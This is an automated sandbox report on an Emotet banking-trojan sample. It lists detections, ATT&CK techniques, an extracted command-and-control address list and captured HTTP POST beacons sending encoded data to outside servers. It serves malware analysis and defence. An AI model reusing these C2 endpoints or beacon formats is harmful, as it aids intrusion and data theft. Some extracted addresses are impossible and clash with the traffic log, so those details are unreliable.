
Analysis Report n5hhkdky_exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:211723
Start date:28.02.2020
Start time:09:29:23
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 15m 32s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:n5hhkdky_exe (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@7/1@0/9
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.5% (good quality ratio 53.2%)
  • Quality average: 79.9%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 85
  • Number of non-executed functions: 397
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | false | Emotet | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access:
  • Valid Accounts 1
  • Replication Through Removable Media
  • External Remote Services
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment
  • Spearphishing via Service
  • Supply Chain Compromise
  • Trusted Relationship
Execution:
  • Execution through API 121
  • Command-Line Interface 2
  • Service Execution 12
  • Scheduled Task
  • Command-Line Interface
  • Graphical User Interface
  • Scripting
  • Third-party Software
  • Rundll32
  • PowerShell
Persistence:
  • Hidden Files and Directories 1
  • Valid Accounts 1
  • Modify Existing Service 11
  • New Service 2
  • Shortcut Modification
  • Modify Existing Service
  • Path Interception
  • Logon Scripts
  • DLL Search Order Hijacking
  • Change Default File Association
Privilege Escalation:
  • Valid Accounts 1
  • Access Token Manipulation 1
  • Process Injection 1
  • New Service 2
  • File System Permissions Weakness
  • New Service
  • Scheduled Task
  • Process Injection
  • Service Registry Permissions Weakness
  • Exploitation for Privilege Escalation
Defense Evasion:
  • Disabling Security Tools 1
  • Software Packing 1
  • Deobfuscate/Decode Files or Information 1
  • File Deletion 1
  • Obfuscated Files or Information 2
  • Masquerading 12
  • Hidden Files and Directories 1
  • Valid Accounts 1
  • Access Token Manipulation 1
  • Process Injection 1
Credential Access:
  • Input Capture 1
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force
  • Two-Factor Authentication Interception
  • Bash History
  • Input Prompt
  • Keychain
Discovery:
  • System Time Discovery 2
  • Security Software Discovery 21
  • System Service Discovery 1
  • File and Directory Discovery 2
  • System Information Discovery 37
  • Process Discovery 2
  • Application Window Discovery 1
  • Network Service Scanning
  • System Network Connections Discovery
  • Process Discovery
Lateral Movement:
  • Remote File Copy 3
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software
  • Pass the Hash
  • Remote Desktop Protocol
  • Windows Admin Shares
  • Taint Shared Content
Collection:
  • Input Capture 1
  • Clipboard Data 2
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
  • Screen Capture
  • Email Collection
  • Clipboard Data
  • Automated Collection
  • Audio Capture
Exfiltration:
  • Data Encrypted 11
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits
  • Exfiltration Over Command and Control Channel
  • Exfiltration Over Alternative Protocol
  • Exfiltration Over Physical Medium
  • Commonly Used Port
Command and Control:
  • Uncommonly Used Port 1
  • Commonly Used Port 1
  • Remote File Copy 3
  • Standard Cryptographic Protocol 22
  • Standard Non-Application Layer Protocol 2
  • Standard Application Layer Protocol 13
  • Uncommonly Used Port
  • Standard Application Layer Protocol
  • Multilayer Encryption
  • Connection Proxy
Network Effects:
  • Eavesdrop on Insecure Network Communication
  • Exploit SS7 to Redirect Phone Calls/SMS
  • Exploit SS7 to Track Device Location
  • SIM Card Swap
  • Manipulate Device Communication
  • Jamming or Denial of Service
  • Rogue Wi-Fi Access Points
  • Downgrade to Insecure Protocols
  • Rogue Cellular Base Station
Remote Service Effects:
  • Remotely Track Device Without Authorization
  • Remotely Wipe Data Without Authorization
  • Obtain Device Cloud Backups
Impact:
  • Data Encrypted for Impact 1
  • Device Lockout
  • Delete Device Data
  • Premium SMS Toll Fraud
  • Manipulate App Store Rankings or Ratings
  • Abuse Accessibility Features
  • Data Encrypted for Impact
  • Generate Fraudulent Advertising Revenue
  • Data Destruction
  • Data Encrypted for Impact

Signature Overview



AV Detection:

Antivirus detection for sample
Source: n5hhkdky_exe.exe | Avira: detection malicious, Label: TR/AD.Emotet.ebaw
Found malware configuration
Source: leelsensor.exe.3280.8.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["59.103.164.174/zeZ30sx6u6cxuuD", "59.110.18.236:443", "206.81.10.215:8080", "107.2.2.28/FpU6cre", "107.2.2.28/537", "486.75.241.230/8HPGE9Y", "486.75.241.230/8HPGE9bD", "190.12.119.180:443", "45.56.88.91:443", "47.50.251.130/HLHvQpxstemprof", "47.50.251.130/HLHvQpx", "186.75.241.230/8HPGE9", "186.75.241.230/8HPGE9bD", "51.68.220.244/THUbD", "51.68.220.244:8080", "88.91.88.91:443"]}
Multi AV Scanner detection for submitted file
Source: n5hhkdky_exe.exe | Virustotal: Detection: 78% | Perma Link
Source: n5hhkdky_exe.exe | Metadefender: Detection: 62% | Perma Link
Source: n5hhkdky_exe.exe | ReversingLabs: Detection: 80%
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.n5hhkdky_exe.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.ebaw
Source: 1.0.n5hhkdky_exe.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.ebaw
Source: 8.0.leelsensor.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.ebaw
Source: 5.0.leelsensor.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.ebaw

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_022B207B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_022B215A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B1F11 CryptExportKey,4_2_022B1F11
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_022B1F75
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B1F56 CryptGetHashParam,4_2_022B1F56
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_022B1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_022B1FFC
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F9207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,8_2_00F9207B
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F91FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,8_2_00F91FFC
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F91F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00F91F75
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F91F11 CryptExportKey,8_2_00F91F11
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F9215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,8_2_00F9215A
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F91F56 CryptGetHashParam,8_2_00F91F56

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 1_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,1_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 1_2_00448F3F lstrlenA,FindFirstFileA,FindClose,1_2_00448F3F
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,4_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe | Code function: 4_2_00448F3F lstrlenA,FindFirstFileA,FindClose,4_2_00448F3F

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.5:49779 -> 190.12.119.180:443
Source: Traffic | Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49781 -> 107.2.2.28:80
Source: Traffic | Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.5:49784 -> 45.56.88.91:443
Source: Traffic | Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.5:49787 -> 206.81.10.215:8080
Source: Traffic | Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.5:49789 -> 186.75.241.230:80
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.5:49791 -> 59.103.164.174:80
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.5:49786 -> 51.68.220.244:8080
Source: global traffic | TCP traffic: 192.168.2.5:49787 -> 206.81.10.215:8080
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: POST /dIcDsclHnHkYC8AHTsU HTTP/1.1Referer: http://45.56.88.91/dIcDsclHnHkYC8AHTsUContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.56.88.91:443Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 49 63 44 73 63 6c 48 6e 48 6b 59 43 38 41 48 54 73 55 3d 55 6a 4c 62 58 53 6e 68 70 30 50 51 67 39 70 32 31 32 49 65 69 68 36 63 4e 55 46 38 54 48 52 63 44 50 69 6a 63 69 59 73 53 6e 67 6d 41 44 65 77 52 53 64 68 66 52 46 38 36 71 4d 53 58 62 56 68 50 70 48 4a 61 6c 44 42 57 6d 6d 49 46 76 77 35 74 57 69 78 33 30 7a 75 6b 33 71 35 47 78 6e 4e 69 79 59 6b 77 7a 79 57 37 59 45 35 57 61 56 6e 65 4d 77 70 45 52 6a 39 55 4f 6f 49 50 72 6f 53 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 
6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: dIcDsclHnHkYC8AHTsU=UjLbXSnhp0PQg9p212Ieih6cNUF8THRcDPijciYsSngmADewRSdhfRF86qMSXbVhPpHJalDBWmmIFvw5tWix30zuk3q5GxnNiyYkwzyW7YE5WaVneMwpERj9UOoIProSd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /THUbD HTTP/1.1Referer: http://51.68.220.244/THUbDContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.68.220.244:8080Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 54 48 55 62 44 3d 54 50 62 66 75 68 72 4c 25 32 42 43 47 45 55 61 73 71 49 4d 72 50 52 47 6e 6e 39 4a 6c 51 4b 6c 49 51 77 43 67 79 35 37 25 32 46 53 49 56 25 32 46 71 79 65 72 68 68 32 38 4c 4d 4c 6a 39 62 51 4f 42 6c 44 35 46 53 35 36 75 52 77 6c 54 61 4e 33 48 69 46 50 50 74 6e 58 4c 79 37 7a 25 32 46 7a 65 42 25 32 46 53 4a 78 4f 45 54 76 36 41 78 70 61 65 25 32 42 31 4f 41 32 67 4c 4d 5a 50 4c 42 42 79 72 69 57 6c 74 78 70 65 25 32 46 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 
41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: THUbD=TPbfuhrL%2BCGEUasqIMrPRGnn9JlQKlIQwCgy57%2FSIV%2Fqyerhh28LMLj9bQOBlD5FS56uRwlTaN3HiFPPtnXLy7z%2FzeB%2FSJxOETv6Axpae%2B1OA2gLMZPLBByriWltxpe%2Fd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /bAvwkbq HTTP/1.1Referer: http://206.81.10.215/bAvwkbqContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 206.81.10.215:8080Content-Length: 598Connection: Keep-AliveCache-Control: no-cacheData Raw: 62 41 76 77 6b 62 71 3d 62 33 32 39 54 61 49 46 45 54 4d 64 4e 39 32 34 56 6a 49 78 7a 74 64 6b 46 79 64 63 66 52 25 32 46 61 4f 43 4c 31 35 7a 71 4a 34 51 4f 33 55 78 4a 4d 42 69 70 71 71 58 44 6a 79 61 55 66 65 68 6d 42 44 47 4f 53 33 76 41 64 4d 65 31 38 6b 56 42 67 74 58 6d 38 44 36 52 66 35 7a 58 7a 51 37 73 66 55 69 67 68 58 55 32 25 32 46 6a 44 49 39 37 66 57 65 39 6b 67 4d 6d 78 51 5a 34 62 67 7a 42 30 79 39 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 
66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: bAvwkbq=b329TaIFETMdN924VjIxztdkFydcfR%2FaOCL15zqJ4QO3UxJMBipqqXDjyaUfehmBDGOS3vAdMe18kVBgtXm8D6Rf5zXzQ7sfUighXU2%2FjDI97fWe9kgMmxQZ4bgzB0y9d3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /zeZ30sx6u6cxuuDrRRH HTTP/1.1Referer: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.103.164.174Content-Length: 616Connection: Keep-AliveCache-Control: no-cacheData Raw: 7a 65 5a 33 30 73 78 36 75 36 63 78 75 75 44 72 52 52 48 3d 61 37 6e 52 65 4e 7a 62 6d 37 39 6d 72 62 64 64 66 49 35 33 39 72 6b 4d 25 32 46 74 6c 4e 25 32 46 4d 34 7a 65 49 74 77 59 34 59 58 4d 69 43 62 42 58 51 50 5a 52 42 37 65 33 43 75 48 66 5a 37 66 4e 68 61 57 76 75 4e 25 32 42 43 55 71 6a 4a 46 63 43 6e 71 66 33 50 36 71 71 31 44 68 62 55 78 4a 70 36 70 51 4c 37 67 59 6b 50 6e 51 59 50 66 77 31 4c 55 70 25 32 42 4f 58 54 57 78 25 32 42 6a 35 33 46 31 61 63 42 37 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 
75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: zeZ30sx6u6cxuuDrRRH=a7nReNzbm79mrbddfI539rkM%2FtlN%2FM4zeItwY4YXMiCbBXQPZRB7e3CuHfZ7fNhaWvuN%2BCUqjJFcCnqf3P6qq1DhbUxJp6pQL7gYkPnQYPfw1LUp%2BOXTWx%2Bj53F1acB7d3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknown | TCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknown | TCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknown | TCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknown | TCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknown | TCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknown | TCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknown | TCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknown | TCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknown | TCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknown | TCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknown | TCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknown | TCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknown | TCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknown | TCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknown | TCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknown | TCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
